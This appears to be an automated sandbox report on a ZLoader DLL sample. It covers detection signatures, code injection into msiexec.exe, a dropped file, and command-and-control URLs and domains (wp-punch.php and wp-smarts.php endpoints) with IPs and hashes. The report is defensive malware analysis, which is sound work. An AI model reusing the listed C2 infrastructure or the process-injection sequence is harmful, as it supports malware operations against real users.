Play interactive tour

Edit tour

Analysis Report v1Us5AICBm

Overview

General Information

Sample Name:	v1Us5AICBm (renamed file extension from none to dll)
Analysis ID:	329945
MD5:	e0af3054669d6232870b87e1e239a689
SHA1:	f0aa6e50471e70d07a1b70207f38538cb31ed569
SHA256:	f8503947e0e984865a29d1e3f8a62ce7034069f49c2a2dd902af68274f192224
Tags:	zloader2
Most interesting Screenshot:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to inject code into remote processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the product ID of Windows

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5312 cmdline: loaddll32.exe 'C:\Users\user\Desktop\v1Us5AICBm.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

msiexec.exe (PID: 6160 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Xyd\yvek.dll

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: v1Us5AICBm.dll	Virustotal: Detection: 47%			Perma Link
Source: v1Us5AICBm.dll	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Xyd\yvek.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: v1Us5AICBm.dll

Joe Sandbox ML: detected

Source: 0.2.loaddll32.exe.10000000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 12.2.msiexec.exe.350000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_0035F4E0 FindFirstFileW,FindNextFileW,

12_2_0035F4E0

Source: C:\Windows\System32\loaddll32.exe	Code function: 4x nop then push 0000000Ah	0_2_1000D830
Source: C:\Windows\System32\loaddll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	0_2_10018830
Source: C:\Windows\System32\loaddll32.exe	Code function: 4x nop then add esi, 02h	0_2_1001CE40
Source: C:\Windows\System32\loaddll32.exe	Code function: 4x nop then push 00000000h	0_2_1001DA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	12_2_0035D830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	12_2_00368830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	12_2_0036DA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	12_2_0036CE40

Source: Joe Sandbox View

IP Address: 70.32.23.56 70.32.23.56

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_00351AF0 InternetReadFile,

12_2_00351AF0

Source: unknown

DNS traffic detected: queries for: www.businessinsurancelaw.com

Source: msiexec.exe, 0000000C.00000003.339000834.0000000000957000.00000004.00000001.sdmp	String found in binary or memory: http://apps.ident
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: http://apps.identrust.comw
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: msiexec.exe, 0000000C.00000003.339000834.0000000000957000.00000004.00000001.sdmp	String found in binary or memory: http://cps.ro
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: msiexec.exe, 0000000C.00000003.306019326.0000000000938000.00000004.00000001.sdmp	String found in binary or memory: http://crl.co
Source: msiexec.exe, 0000000C.00000003.303670263.000000000091B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: msiexec.exe, 0000000C.00000003.303630468.0000000000938000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationA
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: msiexec.exe, 0000000C.00000003.339000834.0000000000957000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: msiexec.exe, 0000000C.00000003.306019326.0000000000938000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca.o
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: msiexec.exe, 0000000C.00000003.306019326.0000000000938000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.cog
Source: msiexec.exe, 0000000C.00000003.303670263.000000000091B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://lamun.pk/
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://lamun.pk/R
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://lamun.pk/wp-punch.php
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://lamun.pk/wp-punch.php(
Source: msiexec.exe, 0000000C.00000003.308169882.0000000000938000.00000004.00000001.sdmp	String found in binary or memory: https://lamun.pk/wp-punch.phpT%
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://lamun.pk/wp-punch.phpc
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://squire.ae/
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://squire.ae/wp-punch.php
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://squire.ae/wp-punch.php?
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://thecype.com/
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://thecype.com/wp-punch.php
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://thecype.com/wp-punch.php)
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://thecype.com/wp-punch.phpefaults
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/;
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/J
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/f
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/j
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp, msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/wp-smarts.php
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/wp-smarts.php;
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/wp-smarts.phpSNfc)
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://theterteboltallbrow.tk/wp-smarts.phpider
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://www.businessinsurancelaw.com/
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://www.businessinsurancelaw.com/wp-punch.php
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://www.businessinsurancelaw.com/wp-punch.php(
Source: msiexec.exe, 0000000C.00000003.303659662.0000000000909000.00000004.00000001.sdmp	String found in binary or memory: https://www.businessinsurancelaw.com/wp-punch.phpVe
Source: msiexec.exe, 0000000C.00000003.303659662.0000000000909000.00000004.00000001.sdmp	String found in binary or memory: https://www.businessinsurancelaw.com/wp-punch.phptw
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/crosoft
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/wp-punch.php
Source: msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/wp-punch.php;
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/wp-punch.phpH
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/wp-punch.phpr
Source: msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	String found in binary or memory: https://www.rcclabbd.com/z#

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009C60	0_2_10009C60
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003A30	0_2_10003A30
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009A60	0_2_10009A60
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001DA70	0_2_1001DA70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10015BF0	0_2_10015BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00359C60	12_2_00359C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00353A30	12_2_00353A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0036DA70	12_2_0036DA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00359A60	12_2_00359A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00365BF0	12_2_00365BF0

Source: v1Us5AICBm.dll

Binary or memory string: OriginalFilenamehole.dll8 vs v1Us5AICBm.dll

Source: C:\Windows\SysWOW64\msiexec.exe

Section loaded: sfc.dll

Jump to behavior

Source: v1Us5AICBm.dll	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: yvek.dll.12.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal68.evad.winDLL@3/1@11/5

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_00369C90 AdjustTokenPrivileges,

12_2_00369C90

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100169A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

0_2_100169A0

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Xyd

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{AE3C19F7-A2D0-F8C5-70B9-D0EFD3468FD7}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8E4429F7-92D0-D8BD-70B9-D0EFD3468FD7}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{3EAD2B6B-904C-6854-70B9-D0EFD3468FD7}

Source: v1Us5AICBm.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: v1Us5AICBm.dll	Virustotal: Detection: 47%
Source: v1Us5AICBm.dll	ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\v1Us5AICBm.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: v1Us5AICBm.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: v1Us5AICBm.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: v1Us5AICBm.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: v1Us5AICBm.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: v1Us5AICBm.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: v1Us5AICBm.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: v1Us5AICBm.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\Hundredsure\northSoil\goend\TogetherChild\hole.pdb source: loaddll32.exe, 00000000.00000002.295157206.0000000010051000.00000002.00020000.sdmp, msiexec.exe, 0000000C.00000003.300345501.00000000045B0000.00000004.00000001.sdmp, v1Us5AICBm.dll

Source: v1Us5AICBm.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: v1Us5AICBm.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: v1Us5AICBm.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: v1Us5AICBm.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: v1Us5AICBm.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000D830 LoadLibraryA,GetProcAddress,

0_2_1000D830

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002807C push eax; ret	0_2_100280D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002E11B pushad ; ret	0_2_1002E11C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002E9F0 push eax; ret	0_2_1002E9F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002A228 push ebx; retf	0_2_1002A22E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10026E58 push FFFFFFFBh; retf	0_2_10026E62
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002779B push ecx; iretd	0_2_100277AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002EBA8 push edi; retf	0_2_1002EBB2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1005FB42 push ebx; ret	0_2_1005FB4A

Source: initial sample	Static PE information: section name: .text entropy: 6.97945124569
Source: initial sample	Static PE information: section name: .text entropy: 6.97945124569

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Xyd\yvek.dll

Jump to dropped file

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100169A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

0_2_100169A0

Source: C:\Windows\SysWOW64\msiexec.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Xyd\yvek.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_0035F4E0 FindFirstFileW,FindNextFileW,

12_2_0035F4E0

Source: msiexec.exe, 0000000C.00000003.303670263.000000000091B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000C.00000003.303670263.000000000091B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100169A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

0_2_100169A0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000D830 LoadLibraryA,GetProcAddress,

0_2_1000D830

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012EF0 mov eax, dword ptr fs:[00000030h]	0_2_10012EF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1005C98D mov eax, dword ptr fs:[00000030h]	0_2_1005C98D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1005C8C3 mov eax, dword ptr fs:[00000030h]	0_2_1005C8C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1005C4CA push dword ptr fs:[00000030h]	0_2_1005C4CA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00362EF0 mov eax, dword ptr fs:[00000030h]	12_2_00362EF0

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

0_2_1000AE40

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe

Jump to behavior

Source: msiexec.exe, 0000000C.00000002.568812035.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 0000000C.00000002.568812035.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 0000000C.00000002.568812035.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: msiexec.exe, 0000000C.00000002.568812035.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001A00 CreateDialogParamW,GetVersion,

0_2_10001A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Access Token Manipulation1	Masquerading1	OS Credential Dumping	Security Software Discovery111	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Access Token Manipulation1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Process Injection112	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	System Information Discovery13	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
v1Us5AICBm.dll	47%	Virustotal		Browse
v1Us5AICBm.dll	28%	ReversingLabs	Win32.Trojan.Generic
v1Us5AICBm.dll	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Xyd\yvek.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Xyd\yvek.dll	28%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.10000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
12.2.msiexec.exe.350000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

Source	Detection	Scanner	Link
squire.ae	2%	Virustotal	Browse
lamun.pk	2%	Virustotal	Browse
rcclabbd.com	0%	Virustotal	Browse
businessinsurancelaw.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://thecype.com/wp-punch.phpefaults	0%	Avira URL Cloud	safe
http://apps.ident	0%	Avira URL Cloud	safe
http://crt.comodoca.o	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://www.rcclabbd.com/wp-punch.phpr	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://theterteboltallbrow.tk/f	0%	Avira URL Cloud	safe
https://www.businessinsurancelaw.com/wp-punch.phpVe	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/j	0%	Avira URL Cloud	safe
http://ocsp.comodoca.cog	0%	Avira URL Cloud	safe
http://ocsp.int-x3.letsencrypt.org0/	0%	URL Reputation	safe
http://ocsp.int-x3.letsencrypt.org0/	0%	URL Reputation	safe
http://ocsp.int-x3.letsencrypt.org0/	0%	URL Reputation	safe
https://www.rcclabbd.com/wp-punch.php;	0%	Avira URL Cloud	safe
https://lamun.pk/	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/wp-smarts.phpSNfc)	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/	0%	Avira URL Cloud	safe
https://squire.ae/wp-punch.php?	0%	Avira URL Cloud	safe
https://www.businessinsurancelaw.com/wp-punch.php	0%	Avira URL Cloud	safe
https://lamun.pk/R	0%	Avira URL Cloud	safe
https://thecype.com/	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/;	0%	Avira URL Cloud	safe
https://www.businessinsurancelaw.com/wp-punch.php(	0%	Avira URL Cloud	safe
https://thecype.com/wp-punch.php)	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/wp-smarts.php;	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/wp-smarts.php	0%	Avira URL Cloud	safe
https://www.rcclabbd.com/crosoft	0%	Avira URL Cloud	safe
https://lamun.pk/wp-punch.php	0%	Avira URL Cloud	safe
https://lamun.pk/wp-punch.phpc	0%	Avira URL Cloud	safe
https://squire.ae/	0%	Avira URL Cloud	safe
https://lamun.pk/wp-punch.phpT%	0%	Avira URL Cloud	safe
https://www.rcclabbd.com/z#	0%	Avira URL Cloud	safe
https://www.rcclabbd.com/wp-punch.php	0%	Avira URL Cloud	safe
https://www.rcclabbd.com/	0%	Avira URL Cloud	safe
http://crl.co	0%	Avira URL Cloud	safe
https://lamun.pk/wp-punch.php(	0%	Avira URL Cloud	safe
https://www.businessinsurancelaw.com/	0%	Avira URL Cloud	safe
https://squire.ae/wp-punch.php	0%	Avira URL Cloud	safe
https://www.rcclabbd.com/wp-punch.phpH	0%	Avira URL Cloud	safe
https://theterteboltallbrow.tk/wp-smarts.phpider	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.ro	0%	Avira URL Cloud	safe
https://thecype.com/wp-punch.php	0%	Avira URL Cloud	safe
https://www.businessinsurancelaw.com/wp-punch.phptw	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
squire.ae	70.32.23.56	true	false	2%, Virustotal, Browse	unknown
lamun.pk	67.23.227.19	true	false	2%, Virustotal, Browse	unknown
rcclabbd.com	192.254.225.195	true	false	0%, Virustotal, Browse	unknown
businessinsurancelaw.com	70.32.23.56	true	false	1%, Virustotal, Browse	unknown
thecype.com	192.3.183.226	true	false		unknown
www.businessinsurancelaw.com	unknown	unknown	false		unknown
theterteboltallbrow.tk	unknown	unknown	false		unknown
www.rcclabbd.com	unknown	unknown	false		unknown

URLs from Memory and Binaries

